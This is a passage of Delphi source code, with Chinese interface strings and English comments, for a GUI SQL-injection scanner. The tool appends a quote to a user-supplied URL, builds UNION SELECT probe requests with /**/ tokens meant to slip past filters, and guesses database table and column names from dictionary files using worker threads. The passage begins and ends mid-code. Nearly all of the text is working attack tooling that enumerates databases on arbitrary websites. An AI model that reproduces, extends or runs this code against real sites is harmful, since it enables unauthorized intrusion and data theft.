r/> { public declarations }
pg1:tprogressbar;
end;
var
form1: tform1;
//scantable :array of scantablethread; // thread array -- superseded by the single scantable below
scanfield :array of scanfieldthread; // one worker per field-dictionary entry; sized with setlength in sbscan2click
scanmanager :array of scanmanagerthread; // not referenced by the code visible in this file
scantable: scantablethread; // single table-name guessing worker, created in sbscan1click
isfinish:boolean=false; // reset to false before each scan; nothing in this file sets it true -- presumably a worker thread does, confirm
n:integer=0; // counter the scan handlers reset to 0; presumably incremented by the worker threads (not visible here)
m:integer=0; // not referenced by the code visible in this file
implementation
{$r *.dfm}
{ tform1 }
{ Show a modal information dialog containing strmsg.
  The caption is the fixed string '提示信息' ("notice"); only the
  message body varies. }
procedure tform1.msgbox(strmsg: string);
const
  dlgcaption = '提示信息';
begin
  application.messagebox(pchar(strmsg), dlgcaption, mb_iconinformation);
end;
{ Derive the global injection base url from the URL edit box.
  In numeric mode (rdbnum checked) the trimmed text is used as typed;
  otherwise a single quote (#39) is appended so the injected SQL closes
  an open string literal. No scheme/host validation is performed here --
  whatever is typed ends up in tidhttp.get. }
procedure tform1.seturl;
var
  base: string;
begin
  base := trim(edtinjurl.text);
  if not rdbnum.checked then
    base := base + #39;
  url := base;
end;
{ "Scan" button: require both the target URL and the keyword, then set
  the global url/keyword, hide the progress bar and start a scanthread.
  The thread is created non-suspended and its reference is dropped when
  this handler returns, so the thread must manage its own lifetime
  (FreeOnTerminate) or the object leaks -- scanthread is defined outside
  this file, confirm. The constructor variant that passed url/keyword/mm
  is kept commented out as in the original. }
procedure tform1.sbscanclick(sender: tobject);
var
  worker: scanthread;
begin
  if edtinjurl.text = '' then
    msgbox('请输入要注入的地址!')
  else if edtkey.text = '' then
    msgbox('请输入要注入的关键字!')
  else
  begin
    seturl;
    keyword := trim(edtkey.text);
    pg1.visible := false;
    //scan :=scanthread.create(url,keyword,mm);
    worker := scanthread.create(false);
  end;
end;
{ Fetch url with Indy and report whether the probe "hit".
  Returns true when the response code is 200 and, if key is non-empty,
  the body contains key. Redirects are followed (the tool otherwise fails
  on redirecting targets) and a 30 s read timeout is applied; no separate
  connect timeout is set here. Any exception raised by the request --
  network failure, non-2xx protocol error, timeout -- is swallowed and
  reported as false, so the caller cannot distinguish "no match" from
  "request failed". }
function tform1.get(url,key: string): boolean;
var
  http: tidhttp;
  body: string;
  hit: boolean;
begin
  hit := false;
  http := tidhttp.create(nil);
  try
    try
      http.handleredirects := true;
      http.readtimeout := 30000;
      body := http.get(url);
      hit := (http.responsecode = 200) and ((key = '') or (pos(key, body) > 0));
    except
      // best-effort: every failure is treated as "no hit"
    end;
  finally
    http.free;
  end;
  result := hit;
end;
{ "Stop" button: raise the global stop flag and hide the progress bar.
  Note that this sets `stoped`, whereas the non-threaded loop in injtable
  polls `isfinish`; whether this button halts that loop depends on who
  sets isfinish, which is not visible in this file. }
procedure tform1.sbstop1click(sender: tobject);
begin
  pg1.visible := false;
  stoped := true;
end;
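{ Non-threaded table-name guessing.
  For each entry of dict_table.txt (loaded into lsbdict) a UNION SELECT
  probe URL is built from the global url and column list istr, logged to
  mm and fetched with get(); when the response contains keyword the entry
  is appended to lvtable with a running index. Requires istr and keyword
  to be set. The loop polls isfinish, which is reset here and never set
  true in this file (the Stop button sets `stoped`), so interruption
  relies on code outside this file.
  Fix vs. original: the probe URL and the result row used `lsbdict.items`
  (the whole TStrings) where the i-th entry `lsbdict.items[i]` was meant. }
procedure tform1.injtable;
var
  i, found: integer;
  entry: string;
begin
  if (istr = '') or (keyword = '') then exit;
  lsbdict.items.clear;
  lvtable.items.clear;
  // raises if dict_table.txt is not located next to the executable
  lsbdict.items.loadfromfile(extractfilepath(application.exename) + 'dict_table.txt');
  found := 0;
  isfinish := false;
  screen.cursor := crhourglass;
  try
    for i := 0 to lsbdict.count - 1 do
    begin
      if isfinish then break;
      entry := lsbdict.items[i];
      // the /**/ tokens stand in for spaces, presumably to slip past naive filters
      injurl := url + '/**/and/**/1=1/**/union/**/select/**/' + istr +
        '/**/from/**/' + entry + '/*';
      mm.lines.add(injurl);
      if get(injurl, keyword) then
      begin
        inc(found);
        with lvtable.items.add do
        begin
          caption := inttostr(found);
          subitems.add(entry);
        end;
      end;
    end;
  finally
    screen.cursor := crdefault;
  end;
end;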
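{ "Scan tables" button: build the column list istr ("1,2,...,N" with
  N = edtfieldnum), load dict_table.txt into lsbdict and start a single
  scantablethread that guesses table names.
  Fixes vs. original: istr is a global and was appended to without being
  reset, so a second click produced "1,2,3,1,2,3" and, after the leading
  character strip, ",2,3,1,2,3"; the field count is now parsed once with
  strtointdef so a non-numeric value exits quietly instead of raising
  EConvertError out of the handler. sbscan2click already resets istr
  before its loop; this handler now does the same. }
procedure tform1.sbscan1click(sender: tobject);
var
  i, fieldnum: integer;
begin
  // non-numeric input maps to 0 and is rejected like any other non-positive count
  fieldnum := strtointdef(edtfieldnum.text, 0);
  if (fieldnum <= 0) or (keyword = '') then exit;
  lsbdict.items.clear;
  lvtable.items.clear;
  n := 0;
  // raises if dict_table.txt is not located next to the executable
  lsbdict.items.loadfromfile(extractfilepath(application.exename) + 'dict_table.txt');
  isfinish := false;
  // rebuild the column list from scratch rather than appending to the previous one
  istr := '';
  for i := 1 to fieldnum do
    istr := istr + ',' + inttostr(i);
  istr := copy(istr, 2, length(istr) - 1);
  // table-name guessing runs in one worker thread
  scantable := scantablethread.create(url, istr, keyword, mm, lvtable);
end;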
procedure tform1.sbscan2click(sender: tobject);
var
i,j,sum:integer;
tablename:string;
begin
if lvtable.items.count<=0 then exit;
if lvtable.selcount<=0 then
begin
msgbox('请选择一个表名!');
exit;
end;
tablename :=trim(lvtable.selected.subitems.gettext);
if tablename='' then exit;
if isfinish=false then
begin
lsbdict.items.clear;
lvfield.items.clear;
mm.clear;
n :=0;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_field.txt');
sum :=lsbdict.count;
istr :='';
pg1.min :=0;
pg1.max :=sum;
pg1.step :=1;
pg1.position :=0;
pg1.visible :=true;
mm.lines.add('开始猜解字段。。。');
mm.lines.add('');
for i:=1 to strtoint(edtfieldnum.text) do
begin
if i=strtoint(spnum.text) then
istr :=istr+',&fieldname&'
else istr :=istr+','+inttostr(i);
end;
if istr<>'' then
istr :=copy(istr,2,length(istr)-1);
setlength(scanfield,sum); // 动态设置线程的数量